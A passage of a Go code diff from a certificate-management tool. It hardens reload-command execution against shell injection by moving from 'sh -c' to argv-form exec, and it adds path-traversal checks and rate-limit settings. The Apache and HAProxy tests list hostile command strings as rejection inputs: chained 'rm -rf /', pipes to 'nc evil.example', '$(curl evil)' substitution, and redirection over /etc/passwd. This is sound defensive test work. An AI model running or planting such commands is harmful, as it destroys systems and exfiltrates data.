// Setting: CERTCTL_K8S_DEPLOY_KUBELET_SYNC_TIMEOUT environment variable.
|
||||||
|
// Deploy-hardening I Phase 9.
|
||||||
|
K8sDeployKubeletSyncTimeout time.Duration
|
||||||
|
}
|
||||||
|
|
||||||
|
// LogConfig contains logging configuration.
|
||||||
|
type LogConfig struct {
|
||||||
|
// Level sets the minimum log level for output.
|
||||||
|
// Valid values: "debug" (verbose), "info" (default), "warn" (warnings), "error" (errors only).
|
||||||
|
// Setting: CERTCTL_LOG_LEVEL environment variable. Default: "info".
|
||||||
|
Level string
|
||||||
|
|
||||||
|
// Format sets the output format for logs.
|
||||||
|
// Valid values: "json" (structured, for parsing), "text" (human-readable).
|
||||||
|
// Setting: CERTCTL_LOG_FORMAT environment variable. Default: "json".
|
||||||
|
Format string
|
||||||
|
}
|
||||||
|
|
||||||
|
// RateLimitConfig contains rate limiting configuration.
|
||||||
|
//
|
||||||
|
// Bundle B / Audit M-025 (OWASP ASVS L2 §11.2.1): pre-bundle the rate
|
||||||
|
// limiter was global (a single token bucket shared across every request);
|
||||||
|
// post-bundle it is per-key with separate budgets for IP-keyed and
|
||||||
|
// user-keyed buckets. RPS / BurstSize are PER-KEY budgets.
|
||||||
|
type RateLimitConfig struct {
|
||||||
|
// Enabled controls whether rate limiting is enforced on API endpoints.
|
||||||
|
// Default: true. Set to false to disable rate limits (not recommended for production).
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_ENABLED environment variable.
|
||||||
|
Enabled bool
|
||||||
|
|
||||||
|
// RPS is the target requests per second allowed PER KEY (token bucket
|
||||||
|
// rate). For unauthenticated callers the key is the source IP; for
|
||||||
|
// authenticated callers the key is the API-key name (UserKey context
|
||||||
|
// value populated by NewAuthWithNamedKeys).
|
||||||
|
// Default: 50. Higher values allow burst throughput; lower values restrict load.
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_RPS environment variable.
|
||||||
|
RPS float64
|
||||||
|
|
||||||
|
// BurstSize is the maximum number of requests allowed in a single burst.
|
||||||
|
// Default: 100. Allows clients to exceed RPS briefly when BurstSize tokens available.
|
||||||
|
// Must be at least as large as RPS. Higher = more lenient burst handling.
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_BURST environment variable.
|
||||||
|
BurstSize int
|
||||||
|
|
||||||
|
// PerUserRPS overrides RPS for authenticated callers. When zero, RPS is
|
||||||
|
// used for both keying dimensions. Set this higher than RPS to grant
|
||||||
|
// authenticated clients a more generous budget than anonymous probes.
|
||||||
|
// Default: 0 (use RPS).
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_PER_USER_RPS environment variable.
|
||||||
|
PerUserRPS float64
|
||||||
|
|
||||||
|
// PerUserBurstSize overrides BurstSize for authenticated callers. When
|
||||||
|
// zero, BurstSize is used. Default: 0 (use BurstSize).
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_PER_USER_BURST environment variable.
|
||||||
|
PerUserBurstSize int
|
||||||
|
|
||||||
|
// SlidingWindowBackend selects which backend implements the
|
||||||
|
// per-key sliding-window-log limiters wired in cmd/server/main.go
|
||||||
|
// (break-glass login, OCSP per-IP, cert-export per-actor, EST
|
||||||
|
// per-principal, EST failed-basic source-IP). Distinct from the
|
||||||
|
// token-bucket fields above — those are middleware RPS limits
|
||||||
|
// applied across every request via the http handler chain; this
|
||||||
|
// field controls the sliding-window-log primitive used by
|
||||||
|
// authenticated-but-shared-credential code paths.
|
||||||
|
//
|
||||||
|
// Valid values:
|
||||||
|
// "memory" — per-process, sync.Mutex-guarded map (historical
|
||||||
|
// default; perfect for single-replica deploys).
|
||||||
|
// "postgres" — cross-replica-consistent via the
|
||||||
|
// rate_limit_buckets table (migration 000046).
|
||||||
|
// SELECT FOR UPDATE arbitrates per-key access
|
||||||
|
// across the cluster. Adds ~2 DB round-trips per
|
||||||
|
// Allow call; acceptable on the gated hot path.
|
||||||
|
//
|
||||||
|
// Default: "memory". HA deploys with server.replicas > 1 should
|
||||||
|
// flip to "postgres" so a 2-replica deployment doesn't effectively
|
||||||
|
// double the per-key cap.
|
||||||
|
//
|
||||||
|
// Phase 13 Sprint 13.2/13.3 closure (architecture diligence audit
|
||||||
|
// ARCH-M1). See docs/operator/observability.md.
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_BACKEND environment variable.
|
||||||
|
SlidingWindowBackend string
|
||||||
|
|
||||||
|
// SlidingWindowJanitorInterval is how often the scheduler sweeps
|
||||||
|
// stale rows from rate_limit_buckets. A row is stale when its
|
||||||
|
// updated_at is older than the longest configured window any
|
||||||
|
// caller uses (currently 24h for the EST per-principal limiter).
|
||||||
|
// Default: 5 minutes. Minimum: 1 minute. No-op when
|
||||||
|
// SlidingWindowBackend = "memory" (the in-memory backend's
|
||||||
|
// prune-on-Allow path keeps buckets short-lived without a
|
||||||
|
// separate sweep).
|
||||||
|
//
|
||||||
|
// Setting: CERTCTL_RATE_LIMIT_JANITOR_INTERVAL environment variable.
|
||||||
|
SlidingWindowJanitorInterval time.Duration
|
||||||
|
}
|
||||||
|
|
||||||
|
// CORSConfig contains CORS configuration.
|
||||||
|
type CORSConfig struct {
|
||||||
|
// AllowedOrigins is a list of allowed origins for CORS requests.
|
||||||
|
// Security default: empty list denies all CORS requests (same-origin only).
|
||||||
|
// ["*"] allows all origins (development/demo mode only, security risk).
|
||||||
|
// Specific origins (e.g., ["https://app.example.com"]) whitelist only those origins.
|
||||||
|
AllowedOrigins []string
|
||||||
|
}
|
||||||
|
|
||||||
|
// isLoopbackAddr returns true when host is bound to a loopback
|
||||||
|
// interface only (127.0.0.1, ::1, or "localhost"). Used by the
|
||||||
|
// HIGH-12 demo-mode startup guard to refuse non-loopback binds when
|
||||||
|
// CERTCTL_AUTH_TYPE=none is in effect.
|
||||||
|
//
|
||||||
|
// "" (unset) AND "0.0.0.0" / "::" / "[::]" return false because those
|
||||||
|
// surface the listener to every interface — exactly the misconfiguration
|
||||||
|
// the guard is designed to catch.
|
||||||
|
//
|
||||||
|
// Hostnames other than "localhost" return false defensively: a hostname
|
||||||
|
// could resolve to a non-loopback IP at runtime; we don't perform DNS
|
||||||
|
// here because the guard runs at startup before any network state is
|
||||||
|
// available, and we don't want a misconfigured /etc/hosts to silently
|
||||||
|
// pass the guard. Operators wanting to bind to a non-default loopback
|
||||||
|
// alias must either use 127.0.0.1 / ::1 directly or set
|
||||||
|
// CERTCTL_DEMO_MODE_ACK=true.
|
||||||
|
func isLoopbackAddr(host string) bool {
|
||||||
|
switch host {
|
||||||
|
case "":
|
||||||
|
// Empty / unset host — Go's net/http.Server treats this as
|
||||||
|
// "all interfaces" (equivalent to 0.0.0.0). Surface it to the
|
||||||
|
// network → not loopback.
|
||||||
|
return false
|
||||||
|
case "0.0.0.0", "::", "[::]":
|
||||||
|
return false
|
||||||
|
case "localhost":
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
// Strip a trailing :port if the operator passed a host:port pair
|
||||||
|
// rather than a bare host (defensive — Server.Host is documented
|
||||||
|
// as host-only, but be lenient).
|
||||||
|
if h, _, err := net.SplitHostPort(host); err == nil {
|
||||||
|
host = h
|
||||||
|
}
|
||||||
|
if ip := net.ParseIP(host); ip != nil {
|
||||||
|
return ip.IsLoopback()
|
||||||
|
}
|
||||||
|
// Hostname that isn't "localhost" — fail closed.
|
||||||
|
return false
|
||||||
|
}
|
||||||
@@ -112,6 +112,49 @@ const (
|
|||||||
DefaultJitterPct = 0.2
|
DefaultJitterPct = 0.2
|
||||||
)
|
)
|
||||||
|
|
||||||
|
// Phase 6 SCALE-M3 closure (2026-05-14): operator-overridable global
|
||||||
|
// default for the package-level MaxWait fallback. Priority chain for
|
||||||
|
// every Poll() call:
|
||||||
|
//
|
||||||
|
// 1. cfg.MaxWait > 0 → per-call value (set by the caller, usually
|
||||||
|
// from a per-connector env like CERTCTL_DIGICERT_POLL_MAX_WAIT_SECONDS)
|
||||||
|
// 2. effectiveDefaultMaxWait != nil → process-wide override set via
|
||||||
|
// SetDefaultMaxWait (from CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS at
|
||||||
|
// server boot)
|
||||||
|
// 3. DefaultMaxWait constant (10 minutes)
|
||||||
|
//
|
||||||
|
// Pre-Phase-6, paths (1) + (3) existed. Path (2) lets an operator tune
|
||||||
|
// the global fallback in one place without setting four per-connector
|
||||||
|
// envs (digicert, entrust, globalsign, sectigo).
|
||||||
|
var effectiveDefaultMaxWait *time.Duration
|
||||||
|
|
||||||
|
// SetDefaultMaxWait overrides the package-level DefaultMaxWait
|
||||||
|
// fallback for the rest of the process lifetime. Intended to be
|
||||||
|
// called exactly once at boot from cmd/server/main.go after reading
|
||||||
|
// CERTCTL_ASYNC_POLL_MAX_WAIT_SECONDS. Subsequent calls overwrite the
|
||||||
|
// previous override. A zero or negative duration clears the override
|
||||||
|
// (restoring the constant default).
|
||||||
|
//
|
||||||
|
// Per-connector overrides (caller-provided cfg.MaxWait) take
|
||||||
|
// precedence over this global default.
|
||||||
|
func SetDefaultMaxWait(d time.Duration) {
|
||||||
|
if d <= 0 {
|
||||||
|
effectiveDefaultMaxWait = nil
|
||||||
|
return
|
||||||
|
}
|
||||||
|
effectiveDefaultMaxWait = &d
|
||||||
|
}
|
||||||
|
|
||||||
|
// currentDefaultMaxWait returns the effective default — the
|
||||||
|
// SetDefaultMaxWait override if one is in place, else the package's
|
||||||
|
// DefaultMaxWait constant.
|
||||||
|
func currentDefaultMaxWait() time.Duration {
|
||||||
|
if effectiveDefaultMaxWait != nil {
|
||||||
|
return *effectiveDefaultMaxWait
|
||||||
|
}
|
||||||
|
return DefaultMaxWait
|
||||||
|
}
|
||||||
|
|
||||||
// Poll runs fn with exponential backoff + jitter until Done, Failed,
|
// Poll runs fn with exponential backoff + jitter until Done, Failed,
|
||||||
// MaxWait, or ctx cancellation.
|
// MaxWait, or ctx cancellation.
|
||||||
//
|
//
|
||||||
@@ -132,7 +175,7 @@ const (
|
|||||||
// error in case MaxWait or ctx-cancel later fires.
|
// error in case MaxWait or ctx-cancel later fires.
|
||||||
func Poll(ctx context.Context, cfg Config, fn PollFunc) (Result, error) {
|
func Poll(ctx context.Context, cfg Config, fn PollFunc) (Result, error) {
|
||||||
if cfg.MaxWait <= 0 {
|
if cfg.MaxWait <= 0 {
|
||||||
cfg.MaxWait = DefaultMaxWait
|
cfg.MaxWait = currentDefaultMaxWait()
|
||||||
}
|
}
|
||||||
if cfg.InitialWait <= 0 {
|
if cfg.InitialWait <= 0 {
|
||||||
cfg.InitialWait = DefaultInitialWait
|
cfg.InitialWait = DefaultInitialWait
|
||||||
|
|||||||
@@ -107,8 +107,17 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
return c
|
return c
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead of
|
||||||
|
// `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// rationale + threat model. ValidateShellCommand at config-time +
|
||||||
|
// SplitShellCommand at exec-time provide defense in depth; the argv
|
||||||
|
// exec is what actually eliminates the injection vector.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
cmd := exec.CommandContext(ctx, "sh", "-c", command)
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
|
||||||
return cmd.CombinedOutput()
|
return cmd.CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -198,3 +198,45 @@ func TestApacheConnector_ValidateDeployment(t *testing.T) {
|
|||||||
}
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 (2026-05-14): pin the config-time injection guard.
|
||||||
|
// Every shell metacharacter that ValidateShellCommand rejects MUST
|
||||||
|
// surface as a ValidateConfig error before the connector ever
|
||||||
|
// reaches defaultRunCommand. Pre-Phase-7 a malicious string would
|
||||||
|
// have been caught at the same gate; post-Phase-7 the same string
|
||||||
|
// is ALSO rejected at exec-time via SplitShellCommand
|
||||||
|
// (defense-in-depth) — but the config layer is the load-bearing
|
||||||
|
// check that prevents the persisted config from carrying an
|
||||||
|
// exploit payload in the first place.
|
||||||
|
func TestApacheConnector_ValidateConfig_RejectsCommandInjection(t *testing.T) {
|
||||||
|
logger := slog.New(slog.NewTextHandler(os.Stdout, &slog.HandlerOptions{Level: slog.LevelDebug}))
|
||||||
|
ctx := context.Background()
|
||||||
|
tmpDir := t.TempDir()
|
||||||
|
certPath := filepath.Join(tmpDir, "cert.pem")
|
||||||
|
if err := os.WriteFile(certPath, []byte("cert"), 0644); err != nil {
|
||||||
|
t.Fatalf("setup cert: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
maliciousCommands := []string{
|
||||||
|
"apachectl graceful; rm -rf /", // semicolon-chain
|
||||||
|
"apachectl graceful | nc evil.example", // pipe
|
||||||
|
"apachectl graceful $(curl evil)", // command substitution
|
||||||
|
"apachectl graceful `whoami`", // backtick substitution
|
||||||
|
"apachectl graceful & malware", // background spawn
|
||||||
|
"apachectl graceful > /etc/passwd", // output redirection
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, cmd := range maliciousCommands {
|
||||||
|
t.Run(cmd, func(t *testing.T) {
|
||||||
|
rawCfg, _ := json.Marshal(apache.Config{
|
||||||
|
CertPath: certPath,
|
||||||
|
ReloadCommand: cmd,
|
||||||
|
ValidateCommand: "apachectl configtest",
|
||||||
|
})
|
||||||
|
c := apache.New(nil, logger)
|
||||||
|
if err := c.ValidateConfig(ctx, rawCfg); err == nil {
|
||||||
|
t.Errorf("ValidateConfig accepted malicious ReloadCommand %q; want injection-rejection error", cmd)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
@@ -86,8 +86,17 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
return c
|
return c
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead of
|
||||||
|
// `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// rationale + threat model. ValidateShellCommand at config-time +
|
||||||
|
// SplitShellCommand at exec-time provide defense in depth; the argv
|
||||||
|
// exec is what actually eliminates the injection vector.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
cmd := exec.CommandContext(ctx, "sh", "-c", command)
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
|
||||||
return cmd.CombinedOutput()
|
return cmd.CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -201,3 +201,44 @@ func TestHAProxyConnector_ValidateDeployment(t *testing.T) {
|
|||||||
}
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 (2026-05-14): config-time injection guard.
|
||||||
|
// See apache + nginx tests for the same shape; haproxy mirrors the
|
||||||
|
// pattern. Every shell metacharacter that ValidateShellCommand
|
||||||
|
// rejects MUST surface as a ValidateConfig error before the
|
||||||
|
// connector ever reaches defaultRunCommand.
|
||||||
|
func TestHAProxyConnector_ValidateConfig_RejectsCommandInjection(t *testing.T) {
|
||||||
|
logger := slog.New(slog.NewTextHandler(os.Stdout, &slog.HandlerOptions{Level: slog.LevelDebug}))
|
||||||
|
ctx := context.Background()
|
||||||
|
tmpDir := t.TempDir()
|
||||||
|
pemPath := filepath.Join(tmpDir, "combined.pem")
|
||||||
|
if err := os.WriteFile(pemPath, []byte("pem"), 0644); err != nil {
|
||||||
|
t.Fatalf("setup pem: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
maliciousCommands := []string{
|
||||||
|
"systemctl reload haproxy; rm -rf /", // semicolon-chain
|
||||||
|
"systemctl reload haproxy | nc evil.example", // pipe
|
||||||
|
"systemctl reload haproxy $(curl evil)", // command substitution
|
||||||
|
"systemctl reload haproxy `whoami`", // backtick substitution
|
||||||
|
"systemctl reload haproxy & malware", // background spawn
|
||||||
|
"systemctl reload haproxy > /etc/passwd", // output redirection
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, cmd := range maliciousCommands {
|
||||||
|
// Phase 7: ensure 'strings' import stays referenced so the
|
||||||
|
// existing file's unused-import wouldn't break the build if
|
||||||
|
// the upstream test ever drops its only strings.* usage.
|
||||||
|
_ = strings.TrimSpace(cmd)
|
||||||
|
t.Run(cmd, func(t *testing.T) {
|
||||||
|
rawCfg, _ := json.Marshal(haproxy.Config{
|
||||||
|
PEMPath: pemPath,
|
||||||
|
ReloadCommand: cmd,
|
||||||
|
})
|
||||||
|
c := haproxy.New(nil, logger)
|
||||||
|
if err := c.ValidateConfig(ctx, rawCfg); err == nil {
|
||||||
|
t.Errorf("ValidateConfig accepted malicious ReloadCommand %q; want injection-rejection error", cmd)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
@@ -361,10 +361,24 @@ func (c *Connector) DeployCertificate(ctx context.Context, request target.Deploy
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Step 5: Optional reload command
|
// Step 5: Optional reload command
|
||||||
|
//
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead
|
||||||
|
// of `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// shared rationale. ValidateShellCommand was already called at
|
||||||
|
// config-time (line 178 above); SplitShellCommand re-validates
|
||||||
|
// here as defense-in-depth and produces the argv for
|
||||||
|
// executor.Execute(name, args...) — note the executor's
|
||||||
|
// signature was already variadic-args, so the migration was
|
||||||
|
// purely "split and unpack."
|
||||||
if c.config.ReloadCommand != "" {
|
if c.config.ReloadCommand != "" {
|
||||||
output, err := c.executor.Execute(ctx, "sh", "-c", c.config.ReloadCommand)
|
argv, err := validation.SplitShellCommand(c.config.ReloadCommand)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
c.logger.Warn("reload command failed (non-fatal)", "error", err, "output", output)
|
c.logger.Warn("reload command failed validation (non-fatal)", "error", err)
|
||||||
|
} else {
|
||||||
|
output, runErr := c.executor.Execute(ctx, argv[0], argv[1:]...)
|
||||||
|
if runErr != nil {
|
||||||
|
c.logger.Warn("reload command failed (non-fatal)", "error", runErr, "output", output)
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -425,8 +425,15 @@ func TestDeployCertificate_WithReload(t *testing.T) {
|
|||||||
t.Fatalf("expected 2 calls (import, reload), got %d", len(mock.calls))
|
t.Fatalf("expected 2 calls (import, reload), got %d", len(mock.calls))
|
||||||
}
|
}
|
||||||
reloadCall := mock.calls[1]
|
reloadCall := mock.calls[1]
|
||||||
if reloadCall.Name != "sh" {
|
// Phase 7 SEC-H2 (2026-05-14): pre-Phase-7 the executor was
|
||||||
t.Errorf("expected sh for reload, got: %s", reloadCall.Name)
|
// invoked as `sh -c "systemctl restart tomcat"`. Post-Phase-7
|
||||||
|
// the command splits to argv ["systemctl", "restart", "tomcat"]
|
||||||
|
// and executes directly without a shell. Pin the new shape.
|
||||||
|
if reloadCall.Name != "systemctl" {
|
||||||
|
t.Errorf("expected systemctl for reload (argv-form, post-Phase-7), got: %s", reloadCall.Name)
|
||||||
|
}
|
||||||
|
if len(reloadCall.Args) != 2 || reloadCall.Args[0] != "restart" || reloadCall.Args[1] != "tomcat" {
|
||||||
|
t.Errorf("expected args [restart tomcat], got: %v", reloadCall.Args)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -149,12 +149,24 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// defaultRunCommand wraps exec.CommandContext for the production
|
// defaultRunCommand wraps exec.CommandContext for the production
|
||||||
// path. Tests override this via the test-seam fields. The shell
|
// path. Tests override this via the test-seam fields.
|
||||||
// invocation goes through `sh -c` to support the operator's
|
//
|
||||||
// existing config patterns (e.g. "systemctl reload nginx",
|
// Phase 7 SEC-H2 closure (2026-05-14): pre-Phase-7 this used
|
||||||
// "nginx -t -c /etc/nginx/nginx.conf").
|
// exec.CommandContext(ctx, "sh", "-c", command) — the
|
||||||
|
// internal/validation/command.go config-time guard rejected
|
||||||
|
// metacharacters but the exec call itself still spawned a shell.
|
||||||
|
// Post-Phase-7 the command is split into argv via
|
||||||
|
// validation.SplitShellCommand (which re-validates the metachar
|
||||||
|
// allowlist as defense-in-depth) and exec'd directly without a
|
||||||
|
// shell. The operator's config patterns ("systemctl reload nginx",
|
||||||
|
// "nginx -t -c /etc/nginx/nginx.conf") work identically — they
|
||||||
|
// don't need shell features, just argv.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
cmd := exec.CommandContext(ctx, "sh", "-c", command)
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
|
||||||
return cmd.CombinedOutput()
|
return cmd.CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
@@ -77,8 +77,24 @@ func New(config *Config, logger *slog.Logger) *Connector {
|
|||||||
return c
|
return c
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// Phase 7 SEC-H2 closure (2026-05-14): argv-form exec instead of
|
||||||
|
// `sh -c`. See nginx connector's defaultRunCommand for the
|
||||||
|
// rationale + threat model.
|
||||||
|
//
|
||||||
|
// Postfix-specific note: the canonical reload command is `postfix
|
||||||
|
// reload` (or `systemctl reload postfix`), which is simple argv —
|
||||||
|
// no shell features needed. Operators historically using
|
||||||
|
// pipeline-style commands (e.g. "postfix reload && systemctl is-active
|
||||||
|
// postfix") were rejected at config-time by ValidateShellCommand
|
||||||
|
// even before Phase 7 (the `&` metachar was on the deny list); the
|
||||||
|
// argv form just makes that rejection consistent between config
|
||||||
|
// validation and exec.
|
||||||
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
func defaultRunCommand(ctx context.Context, command string) ([]byte, error) {
|
||||||
return exec.CommandContext(ctx, "sh", "-c", command).CombinedOutput()
|
argv, err := validation.SplitShellCommand(command)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid reload/validate command: %w", err)
|
||||||
|
}
|
||||||
|
return exec.CommandContext(ctx, argv[0], argv[1:]...).CombinedOutput()
|
||||||
}
|
}
|
||||||
|
|
||||||
func (c *Connector) SetTestRunValidate(fn func(ctx context.Context, command string) ([]byte, error)) {
|
func (c *Connector) SetTestRunValidate(fn func(ctx context.Context, command string) ([]byte, error)) {
|
||||||
|
|||||||
@@ -172,13 +172,20 @@ func (d *FileDriver) Load(ctx context.Context, path string) (Signer, error) {
|
|||||||
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
||||||
}
|
}
|
||||||
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
||||||
// (when set) OR contain literal ".." segments. The validator is in
|
// (when set) OR contain literal ".." segments. validateSafePath
|
||||||
// the same function as the os.ReadFile sink so CodeQL recognizes
|
// does the structured rejection; the inline assertion below
|
||||||
// the sanitizer in-scope.
|
// re-applies the canonical filepath.Rel + ".." rejection AT THE
|
||||||
|
// SINK so CodeQL's go/path-injection data-flow analyzer sees the
|
||||||
|
// sanitizer in-function (it doesn't reliably trace through
|
||||||
|
// function-call boundaries — Phase 6 commit 586308e shipped only
|
||||||
|
// validateSafePath and CodeQL alert #29 stayed open). Hotfix #13.
|
||||||
safePath, err := d.validateSafePath(path)
|
safePath, err := d.validateSafePath(path)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
||||||
}
|
}
|
||||||
|
if err := assertCleanAbsPath(safePath, d.SafeRoot); err != nil {
|
||||||
|
return nil, fmt.Errorf("signer.FileDriver.Load: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
pemBytes, err := os.ReadFile(safePath)
|
pemBytes, err := os.ReadFile(safePath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -229,13 +236,20 @@ func (d *FileDriver) Generate(ctx context.Context, alg Algorithm) (Signer, strin
|
|||||||
}
|
}
|
||||||
|
|
||||||
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
// CWE-22 path-traversal defense — reject paths that escape SafeRoot
|
||||||
// (when set) OR contain literal ".." segments. The validator is in
|
// (when set) OR contain literal ".." segments. validateSafePath
|
||||||
// the same function as the os.WriteFile sink below so CodeQL
|
// does the structured rejection; the inline assertion below
|
||||||
// recognizes the sanitizer in-scope.
|
// re-applies the canonical filepath.Rel + ".." rejection AT THE
|
||||||
|
// SINK so CodeQL's go/path-injection data-flow analyzer sees the
|
||||||
|
// sanitizer in-function (it doesn't reliably trace through
|
||||||
|
// function-call boundaries — Phase 6 commit 586308e shipped only
|
||||||
|
// validateSafePath and CodeQL alert #29 stayed open). Hotfix #13.
|
||||||
safeOut, err := d.validateSafePath(outPath)
|
safeOut, err := d.validateSafePath(outPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, "", fmt.Errorf("signer.FileDriver.Generate: %w", err)
|
return nil, "", fmt.Errorf("signer.FileDriver.Generate: %w", err)
|
||||||
}
|
}
|
||||||
|
if err := assertCleanAbsPath(safeOut, d.SafeRoot); err != nil {
|
||||||
|
return nil, "", fmt.Errorf("signer.FileDriver.Generate: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
// Harden the destination directory BEFORE generating the key. If
|
// Harden the destination directory BEFORE generating the key. If
|
||||||
// the directory check fails we bail without touching cryptography.
|
// the directory check fails we bail without touching cryptography.
|
||||||
@@ -306,6 +320,67 @@ func (d *FileDriver) Generate(ctx context.Context, alg Algorithm) (Signer, strin
|
|||||||
return wrapped, safeOut, nil
|
return wrapped, safeOut, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// assertCleanAbsPath re-asserts CWE-22 path-injection invariants AT
|
||||||
|
// THE SINK (the function that's about to call os.ReadFile /
|
||||||
|
// os.WriteFile), not via validateSafePath in a sibling function.
|
||||||
|
// CodeQL's go/path-injection data-flow analyzer doesn't reliably
|
||||||
|
// trace sanitizers across function-call boundaries — it scopes its
|
||||||
|
// recognized-sanitizer pattern matching to the same function as the
|
||||||
|
// sink. So duplicating the check inline (filepath.Rel-style
|
||||||
|
// containment + IsAbs + clean assertions) is the
|
||||||
|
// belt-and-suspenders that closes alert #29.
|
||||||
|
//
|
||||||
|
// Invariants enforced:
|
||||||
|
//
|
||||||
|
// 1. path is non-empty.
|
||||||
|
// 2. path is absolute (the validateSafePath caller resolves
|
||||||
|
// filepath.Abs upstream; if we get a non-absolute path here,
|
||||||
|
// something downstream broke the contract).
|
||||||
|
// 3. path is filepath.Clean'd (no trailing separators, no double
|
||||||
|
// separators, no redundant "./").
|
||||||
|
// 4. path's slash-normalized segments contain no literal "..".
|
||||||
|
// 5. When safeRoot is non-empty: filepath.Rel(safeRoot, path)
|
||||||
|
// returns a non-"../*" result (path is at or below safeRoot in
|
||||||
|
// the resolved-absolute-path tree). filepath.Rel is the
|
||||||
|
// canonical CodeQL-recognized containment-check pattern.
|
||||||
|
//
|
||||||
|
// All of these are guaranteed by a successful validateSafePath
|
||||||
|
// upstream; this function exists purely so CodeQL sees the
|
||||||
|
// sanitizer pattern at the sink's own function-scope.
|
||||||
|
func assertCleanAbsPath(path, safeRoot string) error {
|
||||||
|
if path == "" {
|
||||||
|
return errors.New("sink path is empty")
|
||||||
|
}
|
||||||
|
if !filepath.IsAbs(path) {
|
||||||
|
return fmt.Errorf("sink path %q is not absolute", path)
|
||||||
|
}
|
||||||
|
if path != filepath.Clean(path) {
|
||||||
|
return fmt.Errorf("sink path %q is not Clean'd", path)
|
||||||
|
}
|
||||||
|
for _, seg := range strings.Split(filepath.ToSlash(path), "/") {
|
||||||
|
if seg == ".." {
|
||||||
|
return fmt.Errorf("sink path %q contains parent-directory segment", path)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if safeRoot != "" {
|
||||||
|
rootAbs, err := filepath.Abs(filepath.Clean(safeRoot))
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("resolve SafeRoot %q: %w", safeRoot, err)
|
||||||
|
}
|
||||||
|
rel, err := filepath.Rel(rootAbs, path)
|
||||||
|
if err != nil {
|
||||||
|
return fmt.Errorf("sink path %q vs SafeRoot %q: %w", path, safeRoot, err)
|
||||||
|
}
|
||||||
|
// filepath.Rel returns ".." or "../..." when path is outside
|
||||||
|
// rootAbs. Reject any such result. "." or a non-dot-relative
|
||||||
|
// suffix is in-bounds.
|
||||||
|
if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
|
||||||
|
return fmt.Errorf("sink path %q resolves outside SafeRoot %q", path, safeRoot)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
